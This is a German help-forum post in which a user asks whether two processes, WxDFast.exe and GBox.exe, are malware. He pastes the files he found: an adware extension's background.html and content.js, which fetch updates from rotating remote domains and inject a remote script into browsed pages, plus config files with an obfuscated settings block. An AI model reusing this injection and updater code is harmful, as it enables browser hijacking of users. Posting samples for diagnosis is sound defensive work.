| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: WxDFast.exe und GBox.exe = Maleware?Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
21.08.2013, 18:48
| #1 |
| |  WxDFast.exe und GBox.exe = Maleware? Hallo erstmal Ich habe das Problem das eben meine CPU ziemlich hoch war. Dann wollte ich wissen welcher Prozess so hoch war und habe mal im Taskmanager nachgeschaut. Als der gestartet war habe ich dann gesehen das ich 2 Prozesse habe die mir komisch vorkommen und viel CPUS brauchen. Das waren WxdFast.exe (Benutzer SYSTEM) und GBox.exe(Benutzer: ich) Die beiden dateien befinden sich unter dem Pfad: C:\ProgramData . Die GBox.exe unter C:\ProgramData\GBox\Gbox.exe und die wXDFast.exe unter C:\ProgramData\wXDFast\wXDFast.exe . Beide dateien sind 206 KB gross. Beide dateienordner wodrin sich die Dateien befinden haben einen leeren "downloads" Ordner und eine settings.ini. Der Ordner wXDFast hat noch eine profil.ini und ein background.html und ein content.js (Javascript) Der Inhalt der background.html: HTML-Code: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script type="text/javascript"> var def_update_url='hxxp://getsyncer5.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://getsync.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://getproxy5.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://getjpit.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://extsync.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://getsyncer5.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://jpi-proxy.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://getjpiproxy.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://jpi-syncer.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://jpigetjson.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158;hxxp://thebflix.info/sync2/?ext=wxd&pid=133&country=DE®d=120811093158'; var def_script='(function(){var str_http=window.self.location.href.indexOf("https://")>-1?"https://":"hxxp://";if(!document.getElementById("wxdbflix_sc")){var script=document.createElement("script");script.id="wxdbflix_sc";script.type="text/javascript";script.src=str_http+"def.jpisyncer.info/worker/init.js?ext=wxd&pid=133&country=DE";document.getElementsByTagName("head")[0].appendChild(script)};})();'; mng = new function(){}; mng.run=function(){ try{ var jsonDB=window.exLocalStorage.getItem('jsondb.js'); if(jsonDB){ try{ jsonDB=JSON.parse(jsonDB); var epoch = mng.getEpoch(); if(parseInt(jsonDB.epoch) < epoch){ updater.update(jsonDB.update_url); } else{ var uto=(parseInt(jsonDB.epoch) - epoch); setTimeout(initialize,uto); } } catch(e){ updater.update(def_update_url); try{tga.track('/IE/bugs/JsonUnValid/'+e);}catch(e){} } } else{ updater.update(def_update_url); try{tga.track('/IE/NewUser');}catch(e){} } } catch(e){ try{tga.track('/IE/bugs/runFailed/'+e);}catch(e){} mng.reload(); } } mng.getEpoch = function(){ var d=new Date(); try{ return ((d.getTime()-d.getMilliseconds())/1000); } catch(e){ return parseInt(d.getTime()/1000); } } mng.reload=function(){ self.location.reload(); } mng.log=function(e){ //console.log(e); return true; } updater = new function(){}; updater.successful=0; updater.scripTag=0; updater.update=function(sUrl){ try{ if(!sUrl){ updater.save({ epoch:1, update_url:def_update_url, scode:def_script }); try{tga.track('/IE/NoDomains');}catch(e){} } else{ if(updater.scripTag){return;} arrUrl=sUrl.split(';'); updater.injectJson(arrUrl[0]); setTimeout(function(){ updater.removeStag(); if(!updater.successful){ sUrl=sUrl.replace(arrUrl[0],'').replace(';',''); updater.update(sUrl); try{tga.track('/IE/NoResponse/'+arrUrl[0]);}catch(e){} } },60000); } } catch(e){ try{tga.track('/IE/bugs/updateFailed/'+e);}catch(e){} mng.reload(); } } updater.injectJson=function(sUrl){ try{ updater.scripTag=document.createElement("script"); updater.scripTag.type="text/javascript"; updater.scripTag.src=sUrl+'&jsoncallback=getJson'; updater.scripTag.id='jsonPscript'; document.getElementsByTagName("head")[0].appendChild(updater.scripTag); } catch(e){ try{tga.track('/IE/bugs/JsonPfailed/'+e);}catch(e){} mng.reload(); } } updater.save=function(json){ try{ window.exLocalStorage.setItem('content.js',json.scode); window.exLocalStorage.setItem('jsondb.js', '{"epoch":'+(mng.getEpoch()+json.useconds)+',"update_url":"'+json.update_url+'"}'); for(k in json){ if(k!='scode' && k!='update_url' && k!='useconds'){ window.exLocalStorage.setItem(k, json[k]); } } updater.successful=1; try{tga.track('/IE/ActiveUsers');}catch(e){} } catch(e){ try{tga.track('/IE/bugs/CantSave/'+e);}catch(e){} } } updater.removeStag=function(){ document.getElementsByTagName("head")[0].removeChild(updater.scripTag); updater.scripTag=0; } tga = new function(){}; tga.track=function(url){ try{ return true; url='/wxd'+url; var urchinCode='UA-29381986-1'; var domain='justplug_analytics.it'; var i=1000000000, utmn=tga.rand(i,9999999999), cookie=tga.cookie, random=tga.rand(i,2147483647), today=(new Date()).getTime(), img = new Image(), urchinUrl = 'hxxp://www.google-analytics.com/__utm.gif?utmwv=1.3&utmn=' +utmn+'&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=' +domain+'&utmr=ie&utmp=' +url+'&utmac=' +urchinCode+'&utmcc=__utma%3D' +cookie+'.'+random+'.'+today+'.'+today+'.' +today+'.2%3B%2B__utmb%3D' +cookie+'%3B%2B__utmc%3D' +cookie+'%3B%2B__utmz%3D' +cookie+'.'+today +'.2.2.utmccn%3D(referral)%7Cutmcsr%3Die_host%7Cutmcct%3Die_path%7Cutmcmd%3Dreferral%3B%2B__utmv%3D' +cookie+'.-%3B'; img.src = urchinUrl; }catch(e){} } tga.rand=function(min,max){ try{ return min + Math.floor(Math.random() * (max - min)); } catch(e){return 1;} } tga.cookie=tga.rand(10000000,99999999); try{tga.track('/IE');}catch(e){} function getJson(json){updater.save(json);}; function initialize(){mng.run();} </script></head><body> </body></html> Code:
ATTFilter (function(){var str_http=window.self.location.href.indexOf("https://")>-1?"https://":"hxxp://";if(!document.getElementById("wxdbflix_sc")){var script=document.createElement("script");script.id="wxdbflix_sc";script.type="text/javascript";script.src=str_http+"def.jpisyncer.info/worker/init.js?ext=wxd&pid=133&country=DE";document.getElementsByTagName("head")[0].appendChild(script)};})();
Code:
ATTFilter [IEPlugin]
modulename="bhoclass.dll"
clsid="{E73D4F0C-551D-C0E0-F981-BC40E0A3FAA8}"
progid="bhoclass.bho"
shortname="wxDfast"
version="1.0"
bgpage="background.html"
contentscript="content.js"
[Settings]
ChromeID = "fgjmgaonhcgbelpohkmegjaneegiigil"
ChromeExt = "fgjmgaonhcgbelpohkmegjaneegiigil.crx"
ChromeVer = "1.0"
IEPlugin = "bhoclass.dll"
FFID = "5026268e6946d@5026268e694a6.info"
ProductName = "wxDfast"
Publisher = "wxDfast"
CategoryName = "Justplugit"
InstallDate = "20120805"
InfoURL = "hxxp://wxdownloadmanager.com"
productID = "{4F4C5E11-0612-48D2-8055-987992AAC432}"
RemoveURL = "hxxp://uninstall.justplug.it/?ext=wxd"
Code:
ATTFilter [mabVaygagnb8ayEaDabHaa]
kabGay1ahab8ayraDabpaywaBnbVaa=lEb5awnamYbZazraDaa
kabGay1ahab8ayraDabday1ahabVaa=lEb5awnamYbZazraDaa
kYbVaygaCYbVazraAabtay5aDabVazsaDYbZayEa=rna5adaaraaEaa
kab8aysaBabPazraAabVazsainbwaa=rnaHadra
nEbLazkaBYb9azsaWnbday1ahabVaa=mabxaa
kYbVayCaAnbHaznahnbGawnagnb9ayka=rYaEadwarYaLadaapaaLadwarna
inbKazraDabZayEaBabVazsainbwaa=qnaEadsaqYaGadYagYa4adgagEbZaysapaaGac5araaFadkaqEaEadsaraaEaa
kEbVazraCEbPay1aBYbtawna=WEbcawsaqnaEadYamYbyadCavna8adsapabbac9amnbdawnanEaJawnannaGadkavna8adganYa6awsamYa6awraqEbxadYannb0aa
kYbVazaaBEbGaznalnbGayEa=Aab9aznaCaa3ac1avEb6azCaDEaKaznaCYbZayraAEbKayEavYbPay5ahYbLac1aAnbKazraDabZayEaBabJaywaDabVac1aCabOazaavEbZayCahnbKaznafEb9azsagnbTaykavYbEayYaCaa/aysaDnbTayIahnb9ad9arYaEadwarYaEadCarnaFaa
lnbEaynagnb9aykaiabLazraDaaFaa=Aab9aznaCaa3ac1avEbEazsaBEb5azUaCEb4ay5agEaKayUaBYbMay1avEbNaykaDaaLaa
lnbEaynagnb9aykaiabLazraDaaGaa=Aab9aznaCaa3ac1avEbSazkaBabIaykaDabPay5aCEb4ay5agEaKayUaBYbMay1avEbNaykaDaaLaa
lnbEaynagnb9aykaiabLazraDaaHaa=Aab9aznaCaa3ac1avEbEazsahnbHazraCYbVayEahnbZazrahnbHazUaBYbTac5aAnbKaygaBEaLayCahnb9ac1a
lnbEaynagnb9aykaknb8aykaCYb4aa=CabGay1ahab8ayraDaa0ackakabGay1ahab8ayraDabpaywaBnbVackatYbEazkagYbPaynaonaVaxaaDnbSayEaAnbHayYahnbGawUamaaVacgahEbVay1aonaVawraBEb8ay5aDabGazUanEbLaynahnaVacgaCYbVayCaAnbHaznahnbGax1ahabZaznahna0ackakYbVayCaAnbHaznahnbGawnagnb9aykatnaMazraBYa0ackakEbVazsaAnbZayEajYb8ay9agYbVazsatnaMayUaBYbHaznaAnbUad9atnbtay5aCEb9aywaBabIaykaCYbtawnatnaMazraAnbUad9atnbjaykaCEbHayUaBEbKawUamaaVacgaDYbVazsaCEbPay1aBYa0adra
nnbTaznaAnb7aykakEbTayYahnbUazkaBabVazsa=lEb5awnamYbZazraDablazaahabZaznahnbGaxnagnbHayIaWEaHawrarnbcawwarnbwadYavnbxawwannbxac9aqaaGawsanYaJadUanYbdadUavna5adkannaGadCapnaEadYanYaHadnamYb0aa
kEbVazsaAnbZayEajYb8ay9agYbVazsa=qEaEaa
lnbEaynagnb9aykaiabLazraDabHaa=Aab9aznaCaa3ac1avEbSazkaBabIaykaDabPay5aCEb4ay5agEaKayUaBYbMay1avEbNaykaDaaLad1aCabGay1ahab8ayraDaa0ackakabGay1ahab8ayraDabpaywaBnbVackatYbEazkagYbPaynaonaVaxaaDnbSayEaAnbHayYahnbGawUamaaVacgahEbVay1aonaVawraBEb8ay5aDabGazUanEbLaynahnaVacgaCEbKad9atnbjaykaCYbPaywaBabpazkaBnbSaykaCYaVacgaAnbKazraDabPaynaonaVawUaBYbHaznagnbIayEahnbGawUamaaVacgaCEbPaynaonaVaxrahnbHazraAnbLay5ainbwackapEbOaznaDabEadOavEaLazaaCYbVazraCEbGaykaBabVaywaCEbVazraWnbKayravYbPay5ahYbLac1ahEbVaznavEa/azaaCYbLaynaDnbTaznaonaVaxaaCYbLaynaDnbTaznajYbZay9ahnaVacgaCab8aysaAnbUad9atnbnazkagYbIayUaCEbOaykaCYbtawnatnaMayCahnbLad9atnbday1aDnbKaznaCYb4awraBEbUaykatnaMazraBYa0ackakEbVazsaAnbZayEajYb8ay9agYbVazsatnaMayUaBYbHaznaAnbUad9atnbtay5aCEb9aywaBabIaykaCYbtawnatnaMazraAnbUad9atnbjaykaCEbHayUaBEbKawUamaaVadIaAab9aznaCaa3ac1avEb8azaahabZaznahnbTay1aAnbKayraAnbUaykavYbPay5ahYbLac1ahEbVaznavEa/azaaCYbLaynaDnbTaznaonaVaxaaCYbLaynaDnbTaznajYbZay9ahnaVacgaCab8aysaAnbUad9atnbnazkagYbIayUaCEbOaykaCYbtawnatnaMayCahnbLad9atnbday1aDnbKaznaCYb4awraBEbUaykatnaMazraBYa0ackakEbVazsaAnbZayEajYb8ay9agYbVazsatnaMayUaBYbHaznaAnbUad9atnbtay5aCEb9aywaBabIaykaCYbtawnatnaMazraAnbUad9atnbjaykaCEbHayUaBEbKawUamaaVadIaAab9aznaCaa3ac1avEb8azaahabZaznahnbHazUaBYbTac5aAnbKaygaBEaLayCahnb9ac1aoEbEazsaBEbUazkagEb9ad9atnbnazsaBEbUazkagEb9aw5agnbJaykatnaMazaaDnbSayUahaa0ackakab8aysaBabPazraAabVazsainbwackatYbNaykaBEa0ackanEbLazkaBYb9azsaWnbday1ahabVackatYbHay5aonaVaxrahnbGayUagnbIaw5aDnbJaysahnbGackatYbPay5aCEb9ayUahaa0ackainbKazraDabZayEaBabVazsainbwackatYbHayUahaa0ackakEbVazraCEbPay1aBYbtawnatna2aa
[jabLayCa]
jabZazraDablazaahabZaznahnbUaa=jnbLay5aDabZayCavaaYadsaraaKacaajnbZayUasaaGadaarnaHacaarna7adOarYa8adOarEaHaa
Ich habe die endlose crx datei (Chrome erweiterungs instalierer) die datei habe ich nurmal in Chrome > Erweiterungen gezogen aber nicht Instalieren gedrückt die Erweiterung heist wXDFast. habe dir GBox.exe mal unter hxxp://www.virustotal.com hochgeladen: Hier scan Ergebniss: https://www.virustotal.com/de/file/31486eb4bf87f2f2dc29d56fc4fc68b7c2790342abb85796b9f7bb113eacb43f/analysis/ Da steht das Der Orginal Name der Datei wXDFast.exe und das 3 Virenprogramme Alarm schlagen. Soweit ich das Verstehe ist das ein Trojan.Dropper   Meine Frage jetzt: Ist das Maleware und wenn ja was soll ich machen Geändert von mikeDE (21.08.2013 um 19:33 Uhr) |
| Themen zu WxDFast.exe und GBox.exe = Maleware? |
| alarm, benutzer, brauche, cookie, cpu, dateien, frage, gen, image, javascript, leeren, mac, maleware, min, ordner, problem, programme, proxy, prozess, prozesse, random, scan, system, taskmanager, update, virus? |
Baum-Darstellung